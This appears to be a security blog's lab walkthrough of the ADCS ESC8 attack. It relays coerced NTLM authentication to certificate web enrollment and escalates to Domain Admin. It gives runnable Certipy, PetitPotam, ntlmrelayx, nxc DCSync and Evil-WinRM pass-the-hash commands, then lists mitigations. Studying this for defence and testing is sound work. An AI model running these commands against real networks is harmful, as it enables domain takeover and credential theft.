Active Directory Certificate Attack

ADCS ESC8 – NTLM Relay to AD CS HTTP Endpoints

ESC8 is a critical vulnerability in Active Directory Certificate Services (ADCS) that targets web enrollment interfaces, making them vulnerable to NTLM relay attacks. If HTTPS is not enforced and the Certificate Authority (CA) supports client authentication or domain computer enrollment templates, attackers can exploit this to impersonate users and escalate privileges. This attack can target any domain machine, including domain controllers, allowing attackers to silently gain higher privileges and further compromise the network. Proper configuration and security measures are essential to prevent ESC8 exploitation.

 Table of Content

  • Overview the ESC8 Attack
  • Prerequisites
  • Lab Setup

Enumeration & Exploitation

  • Method 1: Using Certipy

Post Exploitation

  • Interactive LDAP Shell as Domain Controller using Certipy
  • Method 2: Using Impacket-ntlmrelay
  • Lateral Movement & Privilege Escalation using Evil-Winrm

Mitigation

Overview the ESC8 Attack

ESC8 is a critical Active Directory escalation path that exploits misconfigured AD Certificate Services (ADCS) Web Enrollment, using NTLM relay and coercion to impersonate privileged accounts like Domain Admins. It’s a post-exploitation attack that leverages vulnerable certificate templates and CA settings to silently escalate privileges, without triggering security defenses, and doesn’t rely on malware or zero-day exploits.

ADCS Web Enrollment Architecture

Web Enrollment is an optional feature of ADCS that exposes an HTTP interface at /certsrv, allowing users to:

  • Request new certificates via a browser
  • Renew existing ones
  • Download CA certificates or CRLs

While convenient for internal users and devices, this web portal becomes a serious vulnerability when:

  • It accepts NTLM authentication over HTTP
  • The CA allows enrollment using highly privileged templates
  • There’s no protection against NTLM relay

How It Works:

  • A user submits a certificate request via the web interface.
  • The CA checks the requester’s permissions and certificate template.
  • If approved, the CA signs and issues a valid certificate.
  • The user can then use the certificate for authentication (Kerberos/PKINIT) or for tasks like S/MIME, EFS, etc.

Note: When NTLM authentication is allowed on the Web Enrollment page, it opens the door to NTLM relay attacks, especially if paired with coercion tools like PetitPotam.

ADCS Servers Vulnerable to ESC8 Typically Meet These Conditions:

  • Web Enrollment is enabled (http://192.168.1.10/certsrv/)
  • The Request Disposition on the certificate template is set to Issue (i.e., automatically approve requests)
  • The CA does not enforce strong requestor validation (e.g., no manager approval, no subject name restrictions)

Prerequisite

  • Windows Server 2019 as Active Directory that supports PKINIT as DC1 and DC2.
  • Domain must have Active Directory Certificate Services and Certificate Authority configured and
  • DC2 with web enrollment enabled.
  • Kali Linux packed with tools
  • Tools: Evil-Winrm, certipy-ad, nxc, PetitPotam

Lab Setup

Before we jump into the attack walkthrough, make sure DC2 (the target server) has Active Directory Certificate Services (ADCS) installed with the Web Enrollment role enabled. This is critical, as ESC8 specifically abuses the /certsrv HTTP interface provided by this component.

To install ADCS with Web Enrollment:
  • Firstly, open Server Manager > Add Roles and Features

ADCS ESC8 NTLM Relay Attack

Choose Installation Type
  • On the “Installation Type” screen, select:
  • Role-based or feature-based installation
  • Click Next.

Select the Destination Server
  • Select your local server (ignite.local) from the list.
  • Click Next.

ADCS ESC8 NTLM Relay Attack

Select Server Roles
  • Scroll down and find: Active Directory Certificate Services
  • A pop-up will appear to add dependencies.
  • Click Add Features, then click Next.

After choosing the ADCS role, you’ll be prompted to select which role services to install.

Check:

  • Certification Authority Web Enrollment

Note:Web Enrollment is essential for ESC8 exploitation as it exposes the vulnerable HTTP interface.

Click Next.

Install Required Features
  • On the Features page, accept the defaults and click Next.

ADCS ESC8 NTLM Relay Attack

Confirm and Install
  • On the confirmation screen, review your selections.
  • Optional: Check the box to restart automatically if required.

  • Then, click Install and wait for the installation to complete.

ADCS ESC8 NTLM Relay Attack

Now configure ADCS Post-Installation

Once the installation is complete, a yellow flag will appear in Server Manager.

  • Firstly, Click “Configure Active Directory Certificate Services on this server” to launch the Post-Deployment Configuration Wizard.

In the wizard:

  • Then, Choose the current user if they are a Domain Admin (Administrator in this case).

ADCS ESC8 NTLM Relay Attack

Select the following roles to configure:
  • Certification Authority Web Enrollment

  • Then, Confirm installation path and click Configure.

On the result screen:
  • If the setup is correct, you will see “Configuration Succeeded.”
  • Click Close

ADCS ESC8 NTLM Relay Attack

When successful, you should be able to browse to: http://192.168.1.10/certsrv

Now that our target environment is properly configured, let’s jump into the attack walkthrough.

Enumeration & Exploitation

Method 1 : Using Certipy

This Identify exploitable certificate templates, coerce a domain controller, capture a forged certificate via Certipy relay, and use it for authentication.

Find Vulnerable Templates with Certipy

With credentials for a regular domain user (raj@ignite.local), use Certipy to find templates that allow abuse:

certipy find -u raj@ignite.local -p 'Password@1' -dc-ip 192.168.1.4 -vulnerable -enabled

The command queries AD CS to list enabled templates, identify vulnerabilities, and assess configurations like Template with DomainController EKU,  auto-issue enabled, and enrollable by low-privileged users, combined with Web Enrollment enabled on the CA.

Let’s read the content saved in a .txt or .json file format.

ADCS ESC8 NTLM Relay Attack

Note: If Web Enrollment is enabled without approval or identity validation requirements, the setup is vulnerable to ESC8.

Start Certipy Relay to the CA

On Kali, set up Certipy to listen and relay incoming NTLM traffic to the CA:

certipy-ad relay -target 192.168.1.10 -template DomainController

Coerce Authentication from DC1 (PetitPotam)

Use PetitPotam to force DC1 to authenticate to our Kali listener:

python PetitPotam.py -u raj -p Password@1 192.168.1.11 192.168.1.4

ADCS ESC8 NTLM Relay Attack

What happened?

We exploit PetitPotam through MS-EFSRPC to trick DC1 into sending an NTLM authentication token to us. We then use Certipy to relay it to the CA and request a certificate for DC1$.

Note: This is the core of the ESC8 attack chain, coercion + relay = impersonation.

Relay and Receive Certificate for DC1$

After triggering authentication from DC1 via PetitPotam, the NTLM credentials are relayed to the ADCS Web Enrollment interface (http://192.168.1.10/certsrv), submitting a request using the DomainController template for DC1.

In short, Certipy relays DC1’s authentication to the CA and requests a certificate impersonating DC1$.

certipy-ad relay -target 192.168.1.10 -template DomainController

we now have a .pfx file that lets us to authenticate as the domain controller (DC1$).

Authenticate Using Issued Certificate

Certipy outputs a .pfx file for the DC1$ account. Use it to authenticate:

certipy-ad auth -pfx DC.pfx -dc-ip 192.168.1.4

ADCS ESC8 NTLM Relay Attack

We now hold a NTLM hash for  DC1$.

Post Exploitation

Interactive LDAP Shell as Domain Controller Using Certipy

This uses the dc1.pfx certificate to authenticate to the domain controller via Kerberos, granting access to an interactive LDAP shell as the DC1$ machine account.

certipy-ad auth -pfx dc1.pfx -dc-ip 192.168.1.4 -ldap-shell

Note: We’re not simulating or spoofing; we’re authenticating as a trusted machine account with a legitimate, CA-signed certificate, giving us native, protocol-level access to Active Directory through the LDAP shell.

Method 2: Using Impacket-NTLMRelayx

This shows another toolchain and replicates the same logic, coercion + relay + certificate = impersonation.

impacket-ntlmrelayx  -t http://192.168.1.10/certsrv/certfnsh.asp -smb2support --adcs --template DomainController

ADCS ESC8 NTLM Relay Attack

First, it relays incoming SMB authentication to the Web Enrollment interface on DC2. Then, it automatically requests a certificate using the DomainController template. Finally, upon success, it stores the certificate and key for later use.

Coerce DC1 to Authenticate with nxc

nxc smb 192.168.1.4 -u raj@ignite.local -p Password@1 -d ignite.local -M coerce_plus -o LISTENER=192.168.1.11

This command targets DC1, forces an SMB authentication attempt to the relay listener on Kali, and uses the coerce_plus method triggered via common coercion protocols like MS-EFSRPC and MS-RPRN.

Note: Relay captures this and issues a certificate for DC1$, which you can convert into a .pfx file if needed.

Certificate Issued and Saved via ntlmrelayx

After running the NTLM relay and successfully coercing DC1 using nxc, the output will look something like this:

ADCS ESC8 NTLM Relay Attack

This output confirms that the relay was successful and the CA issued a PKCS#12 certificate, which is saved as: DC1$.pfx

Authenticate as DC1$ with Issued Certificate

We use the issued certificate for DC1$ to authenticate over SMB to DC2, effectively impersonating the domain controller.

nxc smb 192.168.1.10 --pfx-cert dc1.pfx -u "dc1$"

ADCS ESC8 NTLM Relay Attack

Extract Administrator Hash with DCSync

We perform DCSync as DC1 to extract the NTLM hash of the Administrator account.

nxc smb 192.168.1.10 --pfx-cert dc1.pfx -u "dc1$" --ntds --user Administrator

Lateral Movement & Privilege Escalation using Evil-Winrm

evil-winrm -i 192.168.1.4 -u administrator -H 32196b56ffe6f45e294117b91a83bf38

ADCS ESC8 NTLM Relay Attack

We now have a remote, interactive shell as Domain Admin on DC1, all without touching a password.

Mitigation

  • Disable Web Enrollment if not needed, or restrict access to internal users only.
  • Enforce HTTPS and disable or restrict NTLM.
  • Use Kerberos-only authentication and set LmCompatibilityLevel = 5 to refuse NTLMv1.
  • Harden certificate templates by removing Authenticated Users from enroll/auto-enroll and requiring Manager Approval.
  • Restrict CA access and limit template permissions to privileged groups.
  • Audit sensitive templates like DomainController and Administrator.
  • Block coercion vectors by disabling MS-EFSRPC, RPRN, FSRVP, and using Windows Firewall.
  • Enable CA audit logs and monitor for machine cert enrollments and PKINIT events.
  • Enable Extended Protection for Authentication (EPA) to protect /certsrv in IIS.

Author: MD Aslam is a dynamic Information Security leader committed to driving security excellence and mentoring teams to strengthen security across products, networks, and organizations. Contact here